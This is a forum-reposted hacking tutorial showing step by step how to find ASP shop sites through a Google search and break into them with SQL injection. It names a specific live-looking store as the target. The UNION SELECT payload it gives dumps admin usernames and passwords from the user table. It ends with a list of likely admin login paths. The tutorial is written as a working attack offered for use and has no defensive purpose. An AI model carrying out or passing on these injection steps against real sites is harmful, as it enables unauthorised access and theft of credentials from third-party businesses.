引用内容
BEGIN
First go to google.com and put this
inurl:/shopdisplayproducts.asp
Ok, now we find some site with shopdisplayproducts.asp
Let see some site
http://www.globalasp.org.uk/store/s...ducts.asp?id=14
ok ... now we put on end of link this sign '
now link look like this
http://www.globalasp.org.uk/store/shopdisp....asp?id=14'
And we get ERROR
Products
Mcft JET Database Engine error '80040e14'
Syntax error in string in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14' and hide=0 order by specialoffer desc,cname'.
/store/shop$db.asp, line 467
If we see this error then is HACKABLE ) !!!
Ok ... now we removed '
http://www.globalasp.org.uk/store/s...ducts.asp?id=14
and on this add this
%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50%20from%20tbluser'
Link now is
http://www.globalasp.org.uk/store/shopdisp...%20tbluser'
And put it in the browser we get the same error !!!
Ok ... now you see this numbers ...
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50
Now we removed ,50
and we now test
http://www.globalasp.org.uk/store/shopdisp...%20tbluser'
The same error and now we removed and removed number, and when we don't see this error we must see some site, on this server correct number for
exploit is -> 47 <-
http://www.globalasp.org.uk/store/shopdisp...%20tbluser' ---> THIS YOU SEE 47 is the END NUMBER
Ok now we put this in browser and don't see ERROR we see some LAPTOPs
Ok ... now we find on that site numbers 3 and 4
They are small
When we find that numbers we put where are 3 and 4 in link this code line
fldusername,fldpassword
NOw explotable link is this
http://www.globalasp.org.uk/store/shopdisp...%20tbluser'
and look where was 3 and 4 number now there are username and password for
login in SHOPADMIN , now we are going to this link
http://www.globalasp.org.uk/store/colours$config.asp
there is LOGIN for shopadmin and we login !!!
THIS ARE PATH Where CAN BE SHOPADMINs TOO
shopadmin.asp ----> THIS or ... WITH 1
shopadmin1.asp ----> THIS IS IN 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)